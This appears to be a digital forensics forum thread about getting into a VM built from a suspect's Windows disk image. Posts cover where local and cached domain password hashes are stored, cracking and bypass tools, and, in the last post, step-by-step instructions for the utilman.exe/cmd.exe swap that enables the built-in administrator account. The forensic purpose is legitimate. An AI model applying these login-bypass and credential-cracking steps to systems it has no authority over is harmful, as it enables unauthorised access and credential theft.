Because, even if you got your hands on the SAM file, it wouldn't contain the domain credentials. SAM stores local accounts only.
If you want domain credentials, that's in the Security hive file within the image. If he's looking for a specific credential, it may not be there. I think it only caches a limited number of domain logins. You guys are constructing Rube-Golberg solutions.
As for using the domain controller, I doubt that another domain computers passwords would be stored there.
I do not know where the domain controller stores passwords for user accounts in the domain. I'd assume active directory, but I am unsure. It does not come up much.
I have created a virtual machine of a dd image using live view however I need to log into the virtual machine .
The image is from a domain computer
I have tried peter recovery disk but it was unsuccessful
Taurean25,
Liveview makes a Law Enforcement version that allows you to blank user name and passwords when you blow the image into a VM. If you have access to this application i would suggest using it as it will probably prove to be the quickest solution although the other suggestions could also prove successful but would likely require a significant amount of time for the Rainbow tables to break the password. Just an idea.
~N
LiveView LE version - what about those of us not in LE? It isn't free, but has anyone used VFC2 which claims to be able to bypass Windows password requirements?
Cheers
Did you try OpenGates ?
http//
LiveView LE version - what about those of us not in LE? It isn't free, but has anyone used VFC2 which claims to be able to bypass Windows password requirements?
Cheers
You're correct - VFC2 enables you to do this and it's a very useful feature. If you come across a password-protected Windows volume, it is as simple as suspending the VM and running the relevant tool from VFC2. You can then log into any account with any password.
But as you say, it's not free.
Thanks for all your help everyone, the other issue that has not been mentioned is that if the suspect has EFS encrypted files, you will not be able to access those files using the VFC2 method or other password bypass methods mentioned. I believe all these methods mentioned change the password on the accounts.
If you need access to the EFS encrypted files, you will need to use a tool like PRTK or crack the hashes in the SECURITY HIVE if the passwords are hopefully cached there.
if the given tool does not working,try the following link
i think you can reset your password
Hi,
Correct me if i'm wrong….
There is two user types in Windows
1/ local user
- Authentification is local, the user password is compare to the HASH in the SAM file
- Password can be easily wipe or crack Offline NT Password & Registry Editor, Ophcrack,…
2/ domain user
- Authentification is made by Domain controler (DC), the user password is compare to hash in the "ntds.dit" file in the DC
- Password can be crack if you can have access to the DC
- But 1 if a domain is off, user can't connect to their domain account and PC is useless…so windows keeps a hash of domain password in a cache location. These cache credentials are stored in the SECURITY hive (HKLM\Security\Cache).
Different tools can be used to try to crack this encrypted credentials cachedump (http//
- But 2 a local account and a domain account can be present in the same machine so you can try to crack the SAM file to connect to the local account and acces local datas (domain ressources won't be accessibles)…just think to connect to an admin account )
- But 3 If there isn't a local account you can try to activate the default admin account this way
-> boot on ubuntu live cd
-> rename utilman.exe in utilman.exe.old
-> rename cmd.exe in utilman.exe
-> boot the PC, at the login screen tape "Windows" + "U"
-> tape command net user administrator /activeryes
-> reboot system and connect with "administrator" account without Password
That's how I see the problem. Please let me know if I'm wrong or if you have other ways/tools/remarks.
Thanks,
Thierry